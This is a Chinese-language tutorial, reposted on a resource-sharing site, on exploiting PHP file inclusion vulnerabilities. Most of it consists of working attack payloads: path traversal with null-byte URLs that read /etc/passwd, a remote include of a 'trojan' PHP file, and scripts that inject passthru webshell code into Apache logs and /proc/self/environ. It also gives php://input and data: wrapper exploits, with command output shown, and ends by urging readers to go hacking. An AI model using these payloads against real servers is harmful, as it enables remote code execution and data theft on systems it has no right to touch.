也想出现在这里? 联系我们

php包含漏洞替代技术的方法与介绍 php文件包含漏洞详解

作者 : 小编 本文共3119个字,预计阅读时间需要8分钟 发布时间: 2021-06-12 共1.41K人阅读
也想出现在这里? 联系我们

================ php包含漏洞替代技术 ================ php开发者们犯得一个基本的错误是把一个不正当的变量传递给系统函数,特别是include()和require()这两个函数。 这个常见的错误导致了众所周知的远程文件包含漏洞和本地文件包含漏洞。在过去的几年中,php已经开始试图通过缺省设置来消除或限制这种漏洞的所带来影响。 但即使是简单的本地文件包含,也会有新的技术去利用这些漏洞来导致远程命令的执行。 ================ 介绍php包含漏洞 ================ 文件包含漏洞的要点是要去找到一个方法来包含带有你的php恶意代码的文件。 <?php include($_GET[\’content\’]); ?> http://target/index.php?content=/etc/pa sswd http://target/index.php?content=http://trojan/exec.php 这是第一个例子,它包含了本地文件/etc/pa sswd第二个例子包含了一个远程文件,这个远程包含文件在大多数情况下不能使用,因为php设置中的allow_url_fopen默认是off。 当然,通常有此漏洞的php代码会比上面的例子更有限制性,通常是通过在前面加上一个目录,防止远程文件包含,前面加一个文件扩展名来限制可以包含哪些类型的文件。 <?php include("pages/".$_GET[\’content\’].".php"); ?> http://target/index.php?content=../../../etc/pa sswd%00 …/的使用允许目录横向风格的操作,使你可以操作代码中预定目录以外的目录的文件。 如果php设置中open_basedir为on,它将会阻止你绕过过多的目录。 网站的开发者有可能也会使用一些函数来过滤掉来自用户提交的恶意数据,但并非总是如此。 空字节字符%00(\\0)终止字符串,来切断在它之后提交的任何东西,即是当magic_quotes_gpc 默认为on的时候,也可以逃过。 在http://ush.it网站中有一篇名为《PHP文件系统的攻击媒介》提供了可能的方法来应付空字节字符。 php脚本安全也可能取决于像$_GLOBAL[]或$_SERVER[]等的变量,像最近被发现的phplist的漏洞(phplist是一款国外的Email程序),例子为 http://target/phplist/admin/?_SERVER[ConfigFile]=/etc/pa sswd ================== 本地文件包含致远程代码执行 ================== 一次你找到一个本地包含漏洞,你需要找到一个方法去把你的恶意php代码插入一个文件中,大量的技术在过去的几年中出现。 有一种在服务日志中去注入php代码的技术比上面这些包含漏洞要出现的晚。 它是有可能的去把我们的代码插入http请求的头部,然后包含Apache的access_log日志文件(它可能会进行一些测试去找到access_log)。 考虑一下这个例子,在Mac OS X的Apache/PHP默认配置下,写一个脚本去发送一个请求可能是必须的,因为浏览器可能会对一些字符进行转义。 <?php $a = fsockopen("localhost",80); fwrite($a,"GET /<?php p assthru(\\$_GET[\’cmd\’]); ?> HTTP/1.1\\r\\n". "Host: localhost\\r\\n". "Connection: Close\\r\\n\\r\\n"); fclose($a); ?> https://www.jb51.net /index.php?content=/var/log/httpd/access_log&cmd=id 另一种方法是包括了Apache/PHP进程的环境变量的/proc/ self/environ文件。 如果我们将恶意代码插入User-Agent 的头部,这些代码会出现在那个文件里,所以远程执行代码是可能的。 /proc/ self/environ必须是可读的 <?php $a = fsockopen("localhost",80); fwrite($a,"GET /../../../../proc/ self/environ HTTP/1.1\\r\\n". "User-Agent: <?php p assthru(\\$_GET[\’cmd\’]); ?>\\r\\n". "Host: localhost\\r\\n". "Connection: Close\\r\\n\\r\\n"); fclose($a); ?> ================= Php封装包含漏洞 ==================== 利用php的include函数的另一种方法是利用php封装(http://www.php.net/wrappers.php)。这个例子将使用PHP输入,从一个HTTP POST请求的原始数据并执行它: 漏洞代码: <?php include($_GET[\’content\’]); ?> 我们的请求: <?php $request = "<?php p assthru(\’id;\’);?>"; $req = "POST /index.php?content=php://input HTTP/1.1\\r\\n". "Host: localhost\\r\\n". "Content-type: text/html\\r\\n". "Content-length: ".strlen($request)."\\r\\n". "Connection: Close\\r\\n\\r\\n". "$request \\r\\n\\r\\n"; $a = fsockopen("10.0.2.2",80); fwrite($a,$req); echo $req; while (!feof($a)){echo fgets($a, 128);} fclose($a); ?> 得到的结果:uid=33(www-data) gid=33(www-data) groups=33(www-data) 这个例子的前提是allow_url_include和allow_fopen_include两个选项设置为ON,在这种情况下,标准的远程文件包含是可能的。 这个方法的优点是它不依赖于外部储存文件服务器。 cr0w-at.blogspot.com提到另一种技术使用"数据:"封装: index.php?content=data:,<?php s ystem($_GET[c]);?>?&c=dir 或者base64编码过的: index.php?content=data:;base64, \\PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir ============ 总结 ============ 这些方法大多都不是新的,并没有表现出缺陷或在PHP语言本身的局限性。这些问题通常可以通过强大的输入验证,常识编码,和一些预防更严格的服务器配置。 然而,许多问题并不是很快能消失的(SQL注入等),所以开心的去黑吧。 *本文中阐述的漏洞不会存在于Silic Group的网站 *如果你足够细心,你会发现文中很多关键字,例如敏感路径、敏感函数,都被加了个空格 *是因为服务器的防火墙会拦截此类关键字,检测到关键字时服务器就会显示501/503错误 *这就是BlackBap.Org所在服务器拦截的原因 *本站管理员注:-) 作者:Anonymous

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » php包含漏洞替代技术的方法与介绍 php文件包含漏洞详解

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录